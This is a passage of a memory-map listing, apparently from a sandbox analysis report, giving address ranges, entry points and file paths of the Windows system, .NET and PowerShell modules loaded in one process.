entry_point = 0x7fef61a1890
region_type = mapped_file
name = "shdocvw.dll"
filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll")
Region:
id = 1658
start_va = 0x7fef7b70000
end_va = 0x7fef7beffff
entry_point = 0x7fef7b74a8c
region_type = mapped_file
name = "ntshrui.dll"
filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")
Region:
id = 1659
start_va = 0x7fef7bf0000
end_va = 0x7fef7bfefff
entry_point = 0x7fef7bf1040
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 1660
start_va = 0x7fef91c0000
end_va = 0x7fef9216fff
entry_point = 0x7fef91c1118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1661
start_va = 0x7fefb560000
end_va = 0x7fefb5b5fff
entry_point = 0x7fefb56bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1662
start_va = 0x7fefbee0000
end_va = 0x7fefbeeafff
entry_point = 0x7fefbee4f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 1663
start_va = 0x7fefc060000
end_va = 0x7fefc253fff
entry_point = 0x7fefc1ec924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1664
start_va = 0x7fefc4e0000
end_va = 0x7fefc60bfff
entry_point = 0x7fefc4e94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1665
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
entry_point = 0x7fefc741010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1666
start_va = 0x7fefcaf0000
end_va = 0x7fefcb0dfff
entry_point = 0x7fefcaf13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1667
start_va = 0x7fefd540000
end_va = 0x7fefd562fff
entry_point = 0x7fefd541198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 1668
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1669
start_va = 0x7fefd9b0000
end_va = 0x7fefd9c9fff
entry_point = 0x7fefd9b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1670
start_va = 0x7fefda40000
end_va = 0x7fefda75fff
entry_point = 0x7fefda41474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1671
start_va = 0x7fefdb70000
end_va = 0x7fefdd46fff
entry_point = 0x7fefdb71010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1672
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1673
start_va = 0x7fefe7f0000
end_va = 0x7fefe841fff
entry_point = 0x7fefe7f10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1674
start_va = 0x7fefe850000
end_va = 0x7feff5d7fff
entry_point = 0x7fefe8ccebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1675
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1676
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1677
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1678
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1679
start_va = 0x7fef13f0000
end_va = 0x7fef1488fff
entry_point = 0x7fef13f2670
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")
Region:
id = 1680
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1681
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1682
start_va = 0x1ef0000
end_va = 0x1ef0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ef0000"
filename = ""
Region:
id = 1683
start_va = 0x1fe0000
end_va = 0x1feffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 1684
start_va = 0x2760000
end_va = 0x285ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 1685
start_va = 0x2b50000
end_va = 0x2bcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 1686
start_va = 0x75360000
end_va = 0x75428fff
entry_point = 0x75362df0
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll")
Region:
id = 1687
start_va = 0x7fee38d0000
end_va = 0x7fee426cfff
entry_point = 0x7fee3d1a300
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll")
Region:
id = 1688
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1689
start_va = 0x1f00000
end_va = 0x1f02fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f00000"
filename = ""
Region:
id = 1690
start_va = 0x1f90000
end_va = 0x1f90fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f90000"
filename = ""
Region:
id = 1691
start_va = 0x1fa0000
end_va = 0x1fbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fa0000"
filename = ""
Region:
id = 1692
start_va = 0x2a40000
end_va = 0x2abffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 1693
start_va = 0x2bd0000
end_va = 0x1abcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bd0000"
filename = ""
Region:
id = 1694
start_va = 0x1abd0000
end_va = 0x1b29ffff
entry_point = 0x0
region_type = private
name = "private_0x000000001abd0000"
filename = ""
Region:
id = 1695
start_va = 0x1b2a0000
end_va = 0x1b3a0fff
entry_point = 0x0
region_type = private
name = "private_0x000000001b2a0000"
filename = ""
Region:
id = 1696
start_va = 0x1b490000
end_va = 0x1b50ffff
entry_point = 0x0
region_type = private
name = "private_0x000000001b490000"
filename = ""
Region:
id = 1697
start_va = 0x7fee29f0000
end_va = 0x7fee38cbfff
entry_point = 0x7fee29f0000
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll")
Region:
id = 1698
start_va = 0x7ff00020000
end_va = 0x7ff0002ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00020000"
filename = ""
Region:
id = 1699
start_va = 0x7ff00030000
end_va = 0x7ff0003ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00030000"
filename = ""
Region:
id = 1700
start_va = 0x7ff00040000
end_va = 0x7ff000dffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00040000"
filename = ""
Region:
id = 1701
start_va = 0x7ff000e0000
end_va = 0x7ff000effff
entry_point = 0x0
region_type = private
name = "private_0x000007ff000e0000"
filename = ""
Region:
id = 1702
start_va = 0x7ff000f0000
end_va = 0x7ff0015ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff000f0000"
filename = ""
Region:
id = 1703
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1704
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1718
start_va = 0x1fc0000
end_va = 0x1fcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fc0000"
filename = ""
Region:
id = 1719
start_va = 0x1b510000
end_va = 0x1b7f1fff
entry_point = 0x1b79ec1e
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1720
start_va = 0x7fee0230000
end_va = 0x7fee02e1fff
entry_point = 0x7fee0230000
region_type = mapped_file
name = "microsoft.powershell.consolehost.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll")
Region:
id = 1721
start_va = 0x7fee1fc0000
end_va = 0x7fee29e2fff
entry_point = 0x7fee1fc0000
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll")
Region:
id = 1722
start_va = 0x7ff00160000
end_va = 0x7ff0016ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00160000"
filename = ""
Region:
id = 1723
start_va = 0x7fffff00000
end_va = 0x7fffff0ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff00000"
filename = ""
Region:
id = 1724
start_va = 0x7fffff10000
end_va = 0x7fffff9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff10000"
filename = ""
Region:
id = 1726
start_va = 0x7fedf470000
end_va = 0x7fedffccfff
entry_point = 0x7fedf470000
region_type = mapped_file
name = "system.management.automation.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll")
Region:
id = 1731
start_va = 0x1fd0000
end_va = 0x1fd2fff
entry_point = 0x1fd0000
region_type = mapped_file
name = "l_intl.nls"
filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls")
Region:
id = 1732
start_va = 0x1b3b0000
end_va = 0x1b46ffff
entry_point = 0x1b3b0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1737
start_va = 0x779d0000
end_va = 0x779d6fff
entry_point = 0x779d106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1739
start_va = 0x1ff0000
end_va = 0x1ff0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ff0000"
filename = ""
Region:
id = 1741
start_va = 0x2000000
end_va = 0x2004fff
entry_point = 0x2000000
region_type = mapped_file
name = "sorttbls.nlp"
filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")
Region:
id = 1742
start_va = 0x2900000
end_va = 0x2940fff
entry_point = 0x2900000
region_type = mapped_file
name = "sortkey.nlp"
filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")
Region:
id = 1743
start_va = 0x7ff00170000
end_va = 0x7ff0017ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00170000"
filename = ""
Region:
id = 1758
start_va = 0x2860000
end_va = 0x2867fff
entry_point = 0x286302e
region_type = mapped_file
name = "microsoft.wsman.runtime.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll")
Region:
id = 1759
start_va = 0x2870000
end_va = 0x2870fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002870000"
filename = ""
Region:
id = 1760
start_va = 0x1e230000
end_va = 0x1e278fff
entry_point = 0x1e2732b8
region_type = mapped_file
name = "system.transactions.dll"
filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll")
Region:
id = 1761
start_va = 0x7fedee80000
end_va = 0x7fedef64fff
entry_point = 0x7fedee80000
region_type = mapped_file
name = "system.transactions.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll")
Region:
id = 1762
start_va = 0x7fedef70000
end_va = 0x7fedf019fff
entry_point = 0x7fedef70000
region_type = mapped_file
name = "microsoft.wsman.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll")
Region:
id = 1763
start_va = 0x7fedf020000
end_va = 0x7fedf051fff
entry_point = 0x7fedf020000
region_type = mapped_file
name = "system.configuration.install.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll")
Region:
id = 1764
start_va = 0x7fedf060000
end_va = 0x7fedf0c8fff
entry_point = 0x7fedf060000
region_type = mapped_file
name = "microsoft.powershell.commands.diagnostics.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll")
Region:
id = 1765
start_va = 0x7fedf0d0000
end_va = 0x7fedf3fdfff
entry_point = 0x7fedf0d0000
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll")
Region:
id = 1798
start_va = 0x2950000
end_va = 0x2950fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002950000"
filename = ""
Region:
id = 1799
start_va = 0x1b800000
end_va = 0x1b8fffff
entry_point = 0x0
region_type = private
name = "private_0x000000001b800000"
filename = ""
Region:
id = 1800
start_va = 0x642ff4a0000
end_va = 0x642ff4a9fff
entry_point = 0x642ff4a4710
region_type = mapped_file
name = "culture.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll")
Region:
id = 1801
start_va = 0x7fedea50000
end_va = 0x7fedea8dfff
entry_point = 0x7fedea50000
region_type = mapped_file
name = "microsoft.powershell.security.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll")
Region:
id = 1802
start_va = 0x7fedeb40000
end_va = 0x7fedec57fff
entry_point = 0x7fedeb40000
region_type = mapped_file
name = "microsoft.powershell.commands.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll")
Region:
id = 1803
start_va = 0x7fedec60000
end_va = 0x7fedee75fff
entry_point = 0x7fedec60000
region_type = mapped_file
name = "microsoft.powershell.commands.utility.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll")
Region:
id = 1810
start_va = 0x29e0000
end_va = 0x2a33fff
entry_point = 0x29e0000
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll")
Region:
id = 1811
start_va = 0x7fede4e0000
end_va = 0x7fede674fff
entry_point = 0x7fede4e0000
region_type = mapped_file
name = "system.directoryservices.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll")
Region:
id = 1812
start_va = 0x7fede680000
end_va = 0x7fede7ebfff
entry_point = 0x7fede680000
region_type = mapped_file
name = "system.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll")
Region:
id = 1813
start_va = 0x7fee1530000
end_va = 0x7fee1bd4fff
entry_point = 0x7fee1530000
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll")
Region:
id = 1814
start_va = 0x7fef1ae0000
end_va = 0x7fef1ae6fff
entry_point = 0x7fef1ae0000
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")
Region:
id = 1852
start_va = 0x2950000
end_va = 0x2950fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002950000"
filename = ""
Region:
id = 1853
start_va = 0x2ac0000
end_va = 0x2ad0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002ac0000"
filename = ""
Region:
id = 1854
start_va = 0x7fee1120000
end_va = 0x7fee12a3fff
entry_point = 0x7fee1206c60
region_type = mapped_file
name = "mscorjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll")
Region:
id = 1855
start_va = 0x7ff00180000
end_va = 0x7ff0018ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00180000"
filename = ""
Region:
id = 1856
start_va = 0x7ff00190000
end_va = 0x7ff0019ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00190000"
filename = ""
Region:
id = 1857
start_va = 0x7ff001a0000
end_va = 0x7ff001affff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001a0000"
filename = ""
Region:
id = 1858
start_va = 0x7ff001b0000
end_va = 0x7ff001bffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001b0000"
filename = ""
Region:
id = 1859
start_va = 0x7ff001c0000
end_va = 0x7ff001cffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001c0000"
filename = ""
Region:
id = 1860
start_va = 0x7ff001d0000
end_va = 0x7ff001dffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001d0000"
filename = ""
Region:
id = 1861
start_va = 0x7ff001e0000
end_va = 0x7ff001effff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001e0000"
filename = ""
Region:
id = 1892
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
entry_point = 0x7fefd5e1030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1893
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1894
start_va = 0x7ff001f0000
end_va = 0x7ff001fffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001f0000"
filename = ""
Region:
id = 1895
start_va = 0x7ff00200000
end_va = 0x7ff0020ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00200000"
filename = ""
Region:
id = 1896
start_va = 0x7ff00210000
end_va = 0x7ff0021ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00210000"
filename = ""
Region:
id = 1898
start_va = 0x1b900000
end_va = 0x1b9fffff
entry_point = 0x0
region_type = private
name = "private_0x000000001b900000"
filename = ""
Region:
id = 1900
start_va = 0x2ae0000
end_va = 0x2ae0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002ae0000"
filename = ""
Region:
id = 1901
start_va = 0x1ba00000
end_va = 0x1bcfefff
entry_point = 0x1ba00000
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 1902
start_va = 0x7feddb30000
end_va = 0x7fede37afff
entry_point = 0x7feddb30000
region_type = mapped_file
name = "system.data.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\accc3a5269658c8c47fe3e402ac4ac1c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\accc3a5269658c8c47fe3e402ac4ac1c\\system.data.ni.dll")
Region:
id = 1903
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1904
start_va = 0x7fefd840000
end_va = 0x7fefd9a6fff
entry_point = 0x7fefd8410c0
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1905
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1906
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c1504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1907
start_va = 0x7ff00220000
end_va = 0x7ff0022ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00220000"
filename = ""
Region:
id = 1908
start_va = 0x7ff00230000
end_va = 0x7ff0023ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00230000"
filename = ""
Region:
id = 1941
start_va = 0x2af0000
end_va = 0x2afffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002af0000"
filename = ""
Region:
id = 1942
start_va = 0x2b00000
end_va = 0x2b0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 1943
start_va = 0x2b10000
end_va = 0x2b1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b10000"
filename = ""
Region:
id = 1944
start_va = 0x2b20000
end_va = 0x2b2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b20000"
filename = ""
Region:
id = 1945
start_va = 0x7ff00240000
end_va = 0x7ff0024ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00240000"
filename = ""
Region:
id = 1946
start_va = 0x7ff00250000
end_va = 0x7ff0025ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00250000"
filename = ""
Region:
id = 1947
start_va = 0x7ff00260000
end_va = 0x7ff0026ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00260000"
filename = ""
Region:
id = 1954
start_va = 0x2b30000
end_va = 0x2b3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b30000"
filename = ""
Region:
id = 1955
start_va = 0x2b40000
end_va = 0x2b40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002b40000"
filename = ""
Region:
id = 1956
start_va = 0x1bea0000
end_va = 0x1c82ffff
entry_point = 0x0
region_type = private
name = "private_0x000000001bea0000"
filename = ""
Region:
id = 1957
start_va = 0x516f00000
end_va = 0x516fc5fff
entry_point = 0x516f24570
region_type = mapped_file
name = "diasymreader.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\diasymreader.dll")
